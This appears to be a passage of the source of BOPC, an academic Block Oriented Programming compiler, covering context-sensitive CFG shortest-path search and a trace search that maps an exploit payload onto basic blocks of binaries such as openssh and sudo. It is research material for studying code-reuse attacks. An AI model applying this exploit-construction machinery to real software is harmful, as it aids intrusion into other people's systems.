        dbg_prnt(DBG_LVL_4, '\tFunction Depths:')

        for func, (depth, path) in self.__funcdepth.iteritems():
            dbg_prnt(DBG_LVL_4, '%32s: %2d (%s)' % (func.name, depth, pretty_list(path)))


        # print path(s) to the user (DBG_LVL_3 and DBG_LVL_4 only)
        for final, path in zip(finals, paths):

            if path[0] != INFINITY:
                dbg_prnt(DBG_LVL_3, "\tShortest Path (%x -> %x) found (%d): %s" % 
                                    (root.addr, final.addr, path[0], pretty_list(path[1], ' -> ')))

            else:
                dbg_prnt(DBG_LVL_4, "\tNo Shortest Path (%x -> %x) found!" % 
                                    (root.addr, final.addr))

        # clean up clobbering nodes
        for node, _ in nx.get_node_attributes(self.__G, 'clobbering').items(): 
            del self.__G.node[ node ]['clobbering']                  


        return paths                                # return shortest paths (1 for each final node)


    # ---------------------------------------------------------------------------------------------
    # __spur_shortest_path(): This function finds the shortest path between spur and destination
    #       nodes. Function first finds the shortest path using __dijkstra_variant() and then
    #       calculates the spur path lengths and the expanded spur paths. This information is
    #       needed for k_shortest_paths(), because 'depth' attributes are cleared every time we
    #       calculate a spur path and hence it becomes impossible to calculate the length of a
    #       subpath. Therefore we precalculate all the lengths for all subpaths from root to the
    #       i-th node, in order to reuse them later on in k_shortest_paths().
    #
    # :Arg spur: Spur node
    # :Arg dst: Destination node (must be exactly one)
    # :Arg precall_stack: Current precall stack
    # :Ret: If a shortest path exists, function returns a tuple (path, pathlens, expaths) that
    #       contains the path, the spur path lengths and the expanded spur paths. Otherwise,
    #       function returns a tuple with pathlens being set to [-1].
    #
    def __spur_shortest_path( self, spur, dst, cur_uid=-1, precall_stack=[] ):
        # ---------------------------------------------------------------------
        # Clear leftovers in CFG from previous calls. 
        #
        # This is an important step as 'depths' for the same function can vary
        # depending on the root and/or the current state of the algorithm.  As 
        # an example consider the  case where we have a set of functions whose
        # call graph is fully connected (i.e., a very weird form of recursion).
        # In this case the 'depth' of each function depends on the initial entry
        # point.
        # ---------------------------------------------------------------------
        for n, _ in nx.get_edge_attributes(self.__G, 'depth').items():
            del self.__G.edge[ n[0] ][ n[1] ]['depth']

        for n, _ in nx.get_edge_attributes(self.__G, 'path').items():
            del self.__G.edge[ n[0] ][ n[1] ]['path']


        # ---------------------------------------------------------------------
        # Find the shortest (context sensitive) path
        # ---------------------------------------------------------------------        
        paths = self.__dijkstra_variant(ADDR2NODE[spur], [ADDR2NODE[dst]], cur_uid, precall_stack)
        length, path = paths[0]

        if len(paths) != 1:                         # this should never happen
            fatal('__spur_shortest_path() should work with a single path')

        if length == INFINITY:                      # if path doesn't exist, abort
            return ([], [-1], [])


        # ---------------------------------------------------------------------
        # Calculate the spur path lengths and the expanded spur paths
        #
        # pathlens[i] has the length of the shortest subpath "path[:i]"
        # expaths[i] has the expanded shortest subpath "path[:i]"
        # ---------------------------------------------------------------------
        spurlen  = 0
        expath   = [path[0]]
        pathlens = [0]        
        expaths  = [expath[:]]
        

        for u, v in to_edges(path):                 # for every edge on the path
            # Edge (u,v) may not exists (due to indirect jumps). For instance:
            #
            #       .text:000000000040589F        call    xfree
            #       .text:00000000004058A4 loc_4058A4:
            #
            #       .text:0000000000415260 xfree           proc near
            #       .....
            #       .text:000000000041526D        jmp     _free
            #
            #       .plt:00000000004034B0 _free           proc near
            #       .plt:00000000004034B0        jmp     cs:off_621248
            #            
            # In that case, we simply increase length by 1
            if not self.__G.has_edge(ADDR2NODE[u], ADDR2NODE[v]):
                edge_data = { }                     # assign an empty dictionary
            else:
                edge_data = self.__G.edge[ ADDR2NODE[u] ][ ADDR2NODE[v] ]


            # update spurlen (get depth edge if exists)
            spurlen += edge_data.get('depth', 1)
            pathlens.append( spurlen )

            # update expanded paths. Append path (if exists) and the new node
            # (it's important to use [:] to create a copy of expath)
            expath += edge_data.get('path', []) + [v]
            expaths.append(expath[:])


        # The expanded path should have as many nodes as the total length
        #
        # However this is not always true, because the expanded path may not be so "expanded"
        # The only problem with that, is that we my return the same path >1 times
        #
        #       if spurlen != len(expath) - 1:
        #           fatal("Something is wrong with 'expath' in __spur_shortest_path()")


        # The last element of pathlens list is the total path length
        if length != pathlens[-1]:          
            # This may occur, when we have an unresolvable function (eval/sudo/sudo):
            #
            #       .text:000000000040F5A5         test    rbp, rbp
            #       .text:000000000040F5A8         jz      short loc_40F5C6
            #       .text:000000000040F5AA         xor     ebx, ebx
            #       .text:000000000040F5AC         nop     dword ptr [rax+00h]
            #       .text:000000000040F5B0
            #       .text:000000000040F5B0 loc_40F5B0:
            #       .text:000000000040F5B0         mov     rdx, r15
            #       .text:000000000040F5B3         mov     rsi, r14
            #       .text:000000000040F5B6         mov     edi, r13d
            #       .text:000000000040F5B9         call    qword ptr [r12+rbx*8]
            #       .text:000000000040F5BD         add     rbx, 1
            #       .text:000000000040F5C1         cmp     rbx, rbp
            #       .text:000000000040F5C4         jnz     short loc_40F5B0
            #       .text:000000000040F5C6
            #       .text:000000000040F5C6 loc_40F5C6:
            #       .text:000000000040F5C6         mov     rbx, [rsp+38h+var_30]
            #       .text:000000000040F5CB         mov     rbp, [rsp+38h+var_28]
            #       .text:000000000040F5D0         mov     r12, [rsp+38h+var_20]
            #       .text:000000000040F5D5         mov     r13, [rsp+38h+var_18]
            #       .text:000000000040F5DA         mov     r14, [rsp+38h+var_10]
            #       .text:000000000040F5DF         mov     r15, [rsp+38h+var_8]
            #       .text:000000000040F5E4         add     rsp, 38h
            #       .text:000000000040F5E8         retn
            #
            # Here, "call qword ptr [r12+rbx*8]" does not really go anywhere, however the distance
            # from 0x40F5B0 to 0x40F5BD is 2. This happens when we visit a function with length <1.
            #
            #       fatal("Something is wrong with 'pathlens' in __spur_shortest_path()")
            pass

        return (path, pathlens, expaths)            # return spur path


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor.
    #
    # :Arg graph: CFG to work on
    #
    def __init__( self, cfg, clobbering={ }, adj={ } ):
        self.__G          = cfg.graph               # store arguments internally
        self.__clobbering = { }                     # clobbering blocks


        self.__radj = mk_reverse_adj(adj)           # build the reverse adjacency list

        # build a suitable dictionary with clobbering blocks
        for uid, addrs in clobbering.iteritems():
            for addr in addrs:
                self.__clobbering.setdefault(addr, []).append(uid)
       

        super(self.__class__, self).__init__(       # call parent class
            self.__G, 
            self.__spur_shortest_path, 
            lambda node : ADDR2NODE[node]           # transform address index to "node" object 
        )


    # ---------------------------------------------------------------------------------------------
    # shortest_path(): Find the shortest path (with respect to CFG) from a single source to a
    #       destination (destinations can be >1). This function is pretty much a wrapper for
    #       __dijkstra_variant()
    #
    # :Arg src: Source node
    # :Arg dst: Destination node(s)
    # :Arg cur_uid: Current UID of the SPL statement
    # :Ret: A list of tuples with the length and the path for each final node. If addresses are
    #   not valid function returns an empty list.
    #
    def shortest_path( self, src, dst, cur_uid=-1 ):
        if not isinstance(dst, int): single = 0
        else: single = 1; dst = [dst]               # make single destination a list


        try:
            # sp = self.__bfs_variant(ADDR2NODE[src], [ADDR2NODE[d] for d in dst])
            sp = self.__dijkstra_variant(ADDR2NODE[src], [ADDR2NODE[d] for d in dst], cur_uid)

            return sp[0] if single else sp          # if there's 1 path, return a tuple

        except KeyError as val:        
            sp = [(INFINITY, [])]*len(dst)          # failure

            warn("CFG does not have a basic block at address %s (decimal)" % val )
            return sp[0] if single else sp


    # ---------------------------------------------------------------------------------------------
    # shortest_loop(): Find the shortest loop (with respect to CFG) starting from a single source 
    #       The cycle is context sensitive, so we have to use __dijkstra_variant(). To find a loop,
    #       all we have to do, is to find the shortest path from the source to all of its
    #       predecessors and then add one more edge to create a cycle.
    #
    #       Here's a good a example of context sensitivity in cycles:
    #
    #           .text:0000000000404EDB         xor     ebx, ebx
    #           .text:0000000000404EDD         nop     dword ptr [rax]
    #           .text:0000000000404EE0
    #           .text:0000000000404EE0 loc_404EE0:
    #           .text:0000000000404EE0         mov     edi, ds:listen_socks[rbx*4] ; fd
    #           .text:0000000000404EE7         call    _close
    #           .text:0000000000404EEC         lea     eax, [rbx+1]
    #           .text:0000000000404EEF i = rax                                 ; int
    #           .text:0000000000404EEF         add     rbx, 1
    #           .text:0000000000404EF3         cmp     cs:num_listen_socks, eax
    #           .text:0000000000404EF9         jg      short loc_404EE0
    #
    #           .plt:0000000000403160 _close  proc near
    #           .plt:0000000000403160         jmp     cs:off_6210A0
    #
    #       In the above code, there's a cycle: 404eec - 404ee0 - 403160 - 10000a0 - 404eec.
    #       However, if we start searching from 0x403160, we will find no cycle, as we're in a
    #       different context (we don't know where to return from 0x10000a0).
    #
    # :Arg src: Source node
    # :Arg cur_uid: Current UID of the SPL statement
    # :Ret: A tuple with the length and the actual cycle. If a cycle does not exists function 
    #       returns an empty list.
    #
    def shortest_loop( self, src, cur_uid=-1 ):
        try:
            # find all predecessor blocks
            predecessors = [pred for pred in ADDR2NODE[src].predecessors]

            # if there are no predecessors, there are no cycles ;)
            if not predecessors: 
                return (INFINITY, [])


            # find shortest path from source to all predecessors
            sp = self.__dijkstra_variant(ADDR2NODE[src], predecessors, cur_uid)

            # find the shortest among the shortest paths          
            dists = [dist for dist, _ in sp]                  
            idx   = dists.index(min(dists))         # index of the minimum


            if sp[idx][0] == INFINITY:
                cycle = (INFINITY, [])
            else:
                # add the predecessor edge to form a cycle
                # TODO: check if the predecessor edge is in the same context
                cycle = (sp[idx][0] + 1, sp[idx][1] + [src])


            del sp                                  # we don't need you anymore

            return cycle                            # return the shortest loop

        except KeyError as val:        
            warn("CFG does not have a basic block at address %s (decimal)" % val )

            return [(INFINITY, [])]                 # failure


# -------------------------------------------------------------------------------------------------
'''
if __name__ == '__main__':                          # DEBUG ONLY
    set_dbg_lvl( DBG_LVL_0 )


    import angr
    
    project = angr.Project('eval/proftpd/proftpd', load_options={'auto_load_libs': False})    
    CFG     = project.analyses.CFGFast()
    CFG.normalize()

    # create a quick mapping between addresses and nodes (basic blocks)
    for node in CFG.graph.nodes():
        ADDR2NODE[ node.addr ] = node


    # create a quick mapping between basic block addresses and their corresponding functions
    for _, func in CFG.functions.iteritems():
        for addr in func.block_addrs:
            ADDR2FUNC[ addr ] = func


    p = _cfg_shortest_path(CFG)


    paths = []


    # avoid some node
    # CFG.graph.node[ ADDR2NODE[0x4058A4] ]['clobbering'] = 1

    # for ll, pp in p.shortest_path(0x405897, [0x40c8f0]):    
    # for ll, pp in p.k_shortest_paths(0x40f5a5, 0x40f5c6, 0, PARAMETER_P): # sudo
    # for ll, pp in p.k_shortest_paths(0x412c98, 0x40c8f0, 0, PARAMETER_P): # openssh
    

    #for ll, pp in p.k_shortest_paths(0x42acf0, 0x42ad5e, 0, 2): # openssh
    for ll, pp in p.k_shortest_paths(0x406806, 0x42ad5e, 0, 10): # openssh

    #for ll, pp in p.k_shortest_loops(0x4043f5, 0, PARAMETER_P):   # openssh
        print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
        print 'Path (%d): %s' % (ll, pretty_list(pp))

        paths.append( (ll, pp) )

    print 'Printing all paths:'
    for ll, pp in paths:
        print 'Path (%d): %s' % (ll, pretty_list(pp))


    print '\n\n\n******************************************************\n\n\n'

    for ll, pp in p.k_shortest_paths(0x42acf0, 0x42ad5e, 0, 10): # openssh
    

    #for ll, pp in p.k_shortest_loops(0x4043f5, 0, PARAMETER_P):   # openssh
        print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
        print 'Path (%d): %s' % (ll, pretty_list(pp))

        paths.append( (ll, pp) )


    print 'Printing all paths:'
    for ll, pp in paths:
        print 'Path (%d): %s' % (ll, pretty_list(pp))


'''

# TODO: FIX MEEEEE!!!!!!!!!!!!!
# BAD LOOP (mod: 0, set: 2) 40b277 - 40b28f - 402a40 - 10003c0 - 40b299 - 40b2b6 - 
#                           40b2e5 - 40b2eb - 402a80 - 10003e0 - 40b277


# -------------------------------------------------------------------------------------------------


================================================
FILE: source/search.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# search.py:
#
# This module is the "heart" of BOPC. It implements the trace searching algorithm that looks
# for a trace that uses several accepted blocks (and no clobbering blokcs) that successfully
# reconstructs the execution of the SPL payload.
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
import map      as M
import path     as P
import delta    as D
import simulate as S
import output   as O

import math


# -------------------------------------------------------------------------------------------------
# search: This class searches for subsets of accepted blocks that could reconstruct the execution
#   of the SPL payload.
#
class search:
    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __remove_goto: Remove goto statements. Goto are not real statements; that is they don't 
    #       require an accepted block to get executed. Therefore if they stay on the statement
    #       list, we will have a lot of issues. Thus, the best solution is to remove them.
    #       
    # :Arg accepted: A dictionary with all accepted blocks
    # :Arg adj: The adjacency list.
    # :Ret: Function returns a tuple that has the updated adjacency list and another list with all
    #       goto statements that should be removed.
    #
    def __remove_goto( self, accepted, adj ):
        dbg_prnt(DBG_LVL_3, "Removing goto statements...")
        
        # Build the reverse adjacency list (r_adj)
        r_adj = self.__mk_reverse_adjacency_list(adj)
        rm    = []                                  # remove list


        for stmt in self.__IR:                      # iterate over goto statements
            if stmt['type'] == 'jump':               
                rm.append(stmt['uid'])              # add statement to remove list

                # fix every statement that points to the goto
                for src in r_adj[ stmt['uid'] ]:

                    # remove edges that point to the goto
                    adj[src]  = filter(lambda x : x != stmt['uid'], adj[src])                    
                    adj[src] += adj[stmt['uid']]    # add the bypass edge

                    # if we have multiple gotos chained together, also fix the 'target' attribute
                    if  self.__IR[ src ]['type'] == 'jump':
                        self.__IR[ src ]['target'] = stmt['target']


                del adj[ stmt['uid'] ]              # we don't need the goto anymore

                # Now we have to update r_adj as well. The simplest way to do that, is to 
                # rebuild it from scratch (not efficient, but adj is pretty small)
                r_adj = self.__mk_reverse_adjacency_list(adj)


        # return the updated adjacency and the UIDs of the goto statements
        return adj, rm


    # ---------------------------------------------------------------------------------------------
    # __mk_adjacency_list(): This function builds the adjacency list between SPL statements. That
    #       is, the adjacency list indicates the set of possible statements that can be executed
    #       after i-th statement (statement i does not always go to i+1).
    #
    # :Arg stmt_l: A (shuffled) list with the UIDs of all SPL statements.
    # :Ret: A dictionary that has an entry for each statement (except the last one) that shows the
    #       next statements
    #
    def __mk_adjacency_list( self, stmt_l ):
        # To simply this process, we make some observations first.
        #   [1]. The first statement cannot be a conditional jump (it uses a register)
        #   [2]. goto and conditional jumps are single groups
        #   [3]. When a group has >1 statements, then i -> i+1 for each statement in the group

        adj  = { }                                  # The adjacency list (dictionary)
        prev = stmt_l[0]                            # get the first statement

        for curr in stmt_l[1:]:                     # for each statement
            # goto statements have a single target (probably not i+1)
            if self.__IR[prev]['type'] == 'jump':
                adj[prev] = [to_uid(self.__IR[prev]['target'])]
                
            # conditional jumps have two targets (the one is i+1)
            elif self.__IR[prev]['type'] == 'cond':
                # Taken branch always first
                adj[prev] = [to_uid(self.__IR[prev]['target']), curr]

            # every other statement have i+1 as target
            else:
                adj[prev] = [curr]

            prev = curr                             # update previous statement and move on


        # special case for the last statement: There's no next statement, unless it's a jump
        if self.__IR[curr]['type'] in ['jump', 'cond']:
            adj[curr] = [to_uid(self.__IR[ prev ]['target'])]
            

        dbg_arb(DBG_LVL_3, "SPL statement adjacency list", adj)

        return adj                                  # return the adjacency list


    # ---------------------------------------------------------------------------------------------
    # __mk_reverse_adjacency_list(): This function builds the reverse adjacency list between SPL
    #       statements. That is, it actually reverses the edge direction
    #
    # :Arg adj: The adjacency list
    # :Ret: A dictionary that has an entry for each statement (except the last one) that shows the
    #       *previous* statements
    #
    def __mk_reverse_adjacency_list( self, adj ):
        rev_adj = { }

        for a, b in adj.iteritems():
            for c in b:
                rev_adj.setdefault(c, []).append(a)

        return rev_adj


    # ---------------------------------------------------------------------------------------------
    # __shuffle: Shuffle the statements. This function is a generator that every time returns the
    #       SPL statements in a different order, so they can be executed out-of-order. The order
    #       must preserve the execution flow, so statements have to be shuffled in groups.
    #       
    # :Arg accepted: A dictionary with all accepted blocks
    # :Ret: Function is a generator, so each time a different permutation of the SPL payload is 
    #       returned. The permutation is an ordered list with the UIDs of the SPL statements.
    #
    def __shuffle( self, accepted ):
        # -------------------------------------------------------------------------------
        # kth_permutation(): This internal function returns the k-th permutation of a
        #       given sequence of numbers.
        #
        # :Arg group: Group to work on
        # :Arg k: The index of the k-th permutation
        #
        def kth_permutation( group, k ):
            tmpgrp = list(group[:])                 # create a temporary copy of the group
            shuff  = []                             # result            
            fact   = math.factorial(len(group))     # find group's factorial            
            k     %= fact                           # don't go beyonnd n!

            while tmpgrp:
                fact = fact / len(tmpgrp)           # n! /= n
                what, k = k // fact, k % fact       # select element and update k
                
                # add element to shuffle list and remove it from temporary group
                shuff.append( tmpgrp.pop(what) )

            return shuff

        # -------------------------------------------------------------------------------

  
        # ---------------------------------------------------------------------
        # Initialize permutation struct according to statement groups
        # ---------------------------------------------------------------------
        permlist = []                               # permutation list
        upper    = 1                                # total number of permutations

        # iterate on statement groups. Statements in each group can be executed in any
        # order without affecting the execution flow of the SPL program.
        for group in self.__IR.itergroup():
            G = sorted([stmt['uid'] for stmt in group if stmt['type'] != 'varset'])
            
            if G:                                   # discard empty groups
                fact = math.factorial(len(G))         

                # add group to the permutation list. Each element contains the group uids (G),
                # the total number of permutations (n) and the current permutation (i).    
                permlist.append( {'G':G, 'n':fact, 'i':1} )

                upper *= fact                       # calculate upper bound of permutations


        # update upper bound according to the configuration
        if N_OUT_OF_ORDER_ATTEMPTS != -1 and upper > N_OUT_OF_ORDER_ATTEMPTS:
            upper = N_OUT_OF_ORDER_ATTEMPTS


        # return the first permutation. Simply merge all groups (G) from 'permlist'
        yield [x for p in permlist for x in p['G']]


        # ---------------------------------------------------------------------
        # Calculate the remaining upper-1 permutations (1 at a time)
        # ---------------------------------------------------------------------
        # make a list of the permutations groups. E.g.: [[0], [8, 10, 12], [14], [16, 18]]
        perm = [p['G'] for p in permlist]

        for i in range(upper - 1):            
            for j in range(len(permlist)):          # for each permutation group

                # calculate the (i-th + 1) permutation (the next one) for the current group
                perm[j] = kth_permutation(permlist[j]['G'], permlist[j]['i'])
                
                # check if we exhausted all permutations for that group
                if  permlist[j]['i'] % permlist[j]['n'] != 0:
                    permlist[j]['i'] += 1           # if not simply increment current index
                    break                           # and don't move on the next group

                permlist[j]['i'] += 1               # increment index and move on the next group
                
            yield [x for p in perm for x in p]      # return the next permutation (merge first)
 

    # ---------------------------------------------------------------------------------------------
    # __enum_tree(): TODO
    #
    # 
    # :Ret: If function returns 0, we have found a solution!
    #
    def __enum_tree( self, tree, simulation, path=[], prev_uid=-1, totpath=set()  ):

        print 'TREE', tree
        #return 0


        # ---------------------------------------------------------------------
        # If tree is empty we have reached a solution
        # ---------------------------------------------------------------------
        if not tree:
            dbg_arb(DBG_LVL_2, 'Path simulated successfully: ', path)
            

            # Ok we have executed all statements (for one branch of the Hk) successfully.
            # Execution has stopped at the beginning of the accepted block. For goto and
            # return statements that's ok, but for regset, regmod, call and cond we have
            # to execute the final block as well.

            if self.__IR[prev_uid]['type'] not in ['jump', 'return'] or \
                 self.__IR[prev_uid]['type'] == 'return' and self.__IR[prev_uid]['target'] == -1:

                dbg_prnt(DBG_LVL_2, "Final statement is '%s', so we need to do one more step..." % 
                                        self.__IR[prev_uid]['type'])

                term = simulation.step(self.__IR[prev_uid])

                if term == -1: return -1

                self.__terminals += term

            else: self.__terminals.append( path[-1][1] )


            emph('Solution found!', DBG_LVL_1)
            dbg_arb(DBG_LVL_2, 'Path so far', path)

            # base case. Tree enumerated successfully
            # if we reach this point we have a solution (a trace)

            simulation.finalize()

            self.__simstash.append(simulation) 

            # if you want to visualize things
            #
            # visualize('cfg_paths', entry=self.__ep,
            #            options=VO_DRAW_CFG | VO_DRAW_CLOBBERING |
            #            VO_DRAW_ACCEPTED | VO_DRAW_SE_PATHS, paths=allp)
    
            # self.__total_path.union(totpath)
            for a in totpath:
                self.__total_path.add(a)

            X = []
            for a,b,c in path:
                X.append( (c, a) )

            for a, b in to_edges(X):
                self.__path.add((a,b))

            # print 'TOTAL_PATH', totpath, self.__total_path
            return 0
            

        # ---------------------------------------------------------------------
        # Tree is not empty and next node is unique
        # ---------------------------------------------------------------------
        elif isinstance(tree[0], tuple):
            uid, currb, nextb = tree[0]
            
            # TODO: If Hk is disconnected (due to dummy gotos) then
            # a new state needs to be initialized
            #
            # or we can simply discard the state....
            #
            # So, in case of a gap, just throw an exception
 
            print uid, self.__IR[uid], tree[0], self.__adj
            print 'PATH', path, [p[2] for p in path] #, self.__adj[ uid ][0]

            # if currb == nextb: step() && simu_edge(step().addr, nextb) (to go back)
            loopback = False

            #if currb == nextb and uid in self.__adj:# and self.__adj[ uid ][0] in [p[2] for p in path]:              

            # tree[0] is a tuple so we are sure that  self.__adj[uid] has 1 element
            if currb == nextb and uid in self.__adj and uid >= self.__adj[uid][0]:
                error('Do a step first')
                loopback = True


            if nextb == -1:
                nextb = currb                   # make target to be itself

            if currb == -1:
                subpath = []
            else:
                subpath = simulation.simulate_edge(currb, nextb, uid, loopback)
                if subpath == None:
                    return -1

            for (a,b) in to_edges(subpath):
                totpath.add((a,b))

            # edge simulated. Move on the next one!
            if self.__enum_tree(tree[1:], simulation, path+[(currb, nextb, uid)], uid, totpath) < 0:
                return -1


        # ---------------------------------------------------------------------
        # Tree is not empty and next node is a branch (2 paths)
        # ---------------------------------------------------------------------
        elif isinstance(tree[0], list):
            if len(tree[0]) != 2:
                raise Exception('Conditionals with >2 jump targets are not supported.')

            # fork state            
            # print 'FORK', path
            # print 'TREEFORK', tree

            uid0, _, _ = tree[0][0][0]
            uid1, _, _ = tree[0][1][0]

            # print 'UID0', uid0
            # print 'UID1', uid1

            if uid0 != uid1 and self.__IR[uid0]['type'] != 'cond':
                raise Exception('Invalid!!! WTF should not happen!')

            
            condreg = [real for virt, real in self.__regmap \
                            if virt == '__r%d' % self.__IR[uid0]['reg']][0]

            try:
                # create the simulation object
                simulation_2 = simulation.clone(condreg)
                pass  
            except Exception:
                dbg_prnt(DBG_LVL_2, "Cannot create simulation object 2. Discard current Hk")
                return -1
            
            self.__sim_objs.append(simulation_2)

            warn('------------------------------- FIRST---------------------------')

            # propagate previous uid as we only process lists here
            X = self.__enum_tree(tree[0][0], simulation,  path, prev_uid, totpath)

            warn('------------------------------- SECOND ---------------------------')
            print simulation_2.constraints()

            if X < 0 or \
               self.__enum_tree(tree[0][1], simulation_2, path, prev_uid, totpath) < 0:
                    return -1

            warn('------------------------------- DONE ---------------------------')

        # ---------------------------------------------------------------------
        #
        # ---------------------------------------------------------------------
        else:
            raise Exception('Malformed tree!')

        return 0


    # ---------------------------------------------------------------------------------------------
    # __consistent_stashes(): This function checks whether all stashes (i.e., valid solutions) are 
    #       consistent. This is meaningful when delta graph is not flat (i.e., there are >1 active
    #       stashes)
    #
    # :Ret: If stashes are consistent, function returns True. Otherwise, it returns False.
    #
    def __consistent_stashes( self ):
        if len(self.__simstash) < 2:
            return True

        dbg_prnt(DBG_LVL_1, 'Checking whether stashes are consistent ...')

        for simu in self.__simstash:
            print 'Simulation', simu, simu.constraints()

            # ispo: you're fixed ;)
            # error('__consistent_stashes says: fix me ispo!!!!!')


        # check if inireg, mem, and ext are consistent
        for i in range(len(self.__simstash)):
            for j in range(i+1, len(self.__simstash)):

                # check
                sim_a = self.__simstash[i]
                sim_b = self.__simstash[j]
                

                sim_a.update_globals()          # update global variables
                sim_b.update_globals()

                # self.__inireg[ reg ] = val
                for a, b in sim_a.inireg.iteritems():
                    if b == None:
                        continue
                    
                    if sim_b.inireg[a] != None and sim_b.inireg[a] != b:
                        
                        warn("Inconsistent values (0x%x != 0x%x) for register '%s'" % 
                                (b, sim_b.inireg[a], a))

                        return False

    
                for a, b in sim_a.mem.iteritems():
                    if not b:                       # skip unneeded memory writes
                        continue


                    # address is used in both stashes
                    if a in sim_b.mem and sim_b.mem[a]: 

                        if not isinstance(b, tuple) or not isinstance(sim_b.mem[a], tuple):
                            continue

                        if b[0] != sim_b.mem[a][0]:
                            
                            warn("Inconsistent values (0x%x:%d != 0x%x:%d) for address '0x%x'" % 
                                (b[0], b[1], sim_b.mem[a][0], sim_b.mem[a][1], a))

                            # what if sizes are different?
                            if b[1] != sim_b.mem[a][1]:
                                fatal('Idk how to handle that!!!!!!!')
                            
                            return False


                # self.__ext[ var ] = (addr, value)
                for a, b in sim_a.ext.iteritems():
                    

                    if a.shallow_repr() in sim_b.ext and sim_b.ext[a.shallow_repr()] != b:
                        warn("Inconsistent values (0x%x:%d != 0x%x:%d) for external input '%s'" % 
                                (b, sim_b.ext[a][0], sim_b.ext[a][1], a[0], a[1]))

                        return False

        for a, b in sim_a.mem.iteritems():
            print 'MEM A', hex(a), b

        print '---------------------------------------------------------'
        for a, b in sim_b.mem.iteritems():
            print 'MEM B', hex(a), b

        # Assume they're ok for now...
        return True
        

    # ---------------------------------------------------------------------------------------------
    # __mapping_callback(): This callback function is invoked every time that a register and a
    #       variable mappings are found.
    #
    # :Arg regmap: The register mapping as a list of (virtual_register, real_register) tuples
    # :Arg varmap: The variable mapping as a list of (name, value) tuples
    # :Ret: A returned value of 0 causes the callback function to be invoked again with a different
    #       mapping (it means that the current mapping wasn't suitable). When function returns -1,
    #       the enumeration process halts and the callback function returns to the enum_mappings()
    #       caller (this means that the current mapping ended up in a valid solution).
    #
    def __mapping_callback( self, regmap, varmap ):
        self.__varmap = varmap                      # save current variable mapping
        self.__regmap = regmap
        self.__ctr   += 1                           # increment counter

        #
        # varmap = [('argv', '*<BV64 mem_7fffffffffef148_4056_64 + 0x68>'), 
        #          ('prog', '*<BV64 mem_7fffffffffef148_4056_64 + 0x30>')]
        # self.__varmap = varmap
        #
        #
        # for a, b in SYM2ADDR.iteritems():
        #     print 'XXXX', a, hex(b)
        #
        # exit()
        #
        # regmap = [('__r0', 'r13'), ('__r1', 'rax')]
        # varmap = [('array', '*<BV64 0x621bf0>')]
        # self.__varmap = varmap
        #
        # regmap = [('__r0', 'rdi'), ('__r1', 'rsi')]
        # varmap = [('array', 6851008L)]
        # self.__varmap = varmap

        
        # if case that you want to apply a specific mapping, discard all others
        # TODO: Replace < with != (?)
        if self.__options['mapping-id'] != -1 and self.__ctr < self.__options['mapping-id']: 
            # dbg_prnt(DBG_LVL_1, "Discard current mapping.")
            return 0


        # ---------------------------------------------------------------------
        # Pretty-print the register/variable mappings
        # ---------------------------------------------------------------------
        emph('Trying mapping #%s:' % bold(self.__ctr), DBG_LVL_1)

        s = ['%s <-> %s' % (bolds(virt), bolds(real)) for virt, real in regmap]
        emph('\tRegisters: %s' % ' | '.join(s), DBG_LVL_1)


        s = ['%s <-> %s' % (bolds(var), bolds(hex(val) if isinstance(val, long) else str(val))) 
                    for var, val in varmap]
        emph('\tVariables: %s' % ' | '.join(s), DBG_LVL_1)


        # ---------------------------------------------------------------------
        # Apply (any) filters to the current mapping (DEBUG)
        # ---------------------------------------------------------------------

        # if you want to enumerate mappings, don't move on
        if self.__options['enum']:
            return 0

    
        self.__options['#mappings'] += 1


        # ---------------------------------------------------------------------
        # Identify accepted and clobbering blocks
        # ---------------------------------------------------------------------
        '''
        # We check this out on marking to be more efficient

        if 'rsp' in [real for _, real in regmap]:   # make sure that 'rsp' is not used
            fatal("A virtual register cannot be mapped to %s. Discard mapping..." % bolds('rsp'))
            return 0                                # try another mapping

        if not MAKE_RBP_SYMBOLIC and 'rbp' in [real for _, real in regmap]:
            fatal("A virtual register cannot be mapped to %s. Discard mapping..." % bolds('rbp'))

            return 0

        '''


        # given the current mapping, go back to the CFG and mark all accepted blocks
        accblks, rsvp = self.__mark.mark_accepted(regmap, varmap)  
        
        # if there is (are) >= 1 statement(s) that don't have accepted blocks, discard mapping
        if not accblks:
            dbg_prnt(DBG_LVL_1, 'There are not enough accepted blocks. Discard mapping...')
            return 0                                # try another mapping


        # if there are enough accepted blocks, go back to the CFG and mark clobbering blocks
        cloblks = self.__mark.mark_clobbering( regmap, varmap )

        # At this point you can visualize the CFG
        #
        # visualize('cfg_test', entry=self.__entry,
        #     options=VO_DRAW_CFG | VO_DRAW_CLOBBERING | VO_DRAW_ACCEPTED | VO_DRAW_CANDIDATE)


        # add entry point to accblks (with min uid) to avoid special cases
        accblks[ START_PC ] = [self.__entry]


        # also add SPL's return address as an acceptd block
        for stmt in self.__IR:                      # return is the last statement in IR
            if stmt['type'] == 'return':

                # check that target address is a valid address of a basic block 
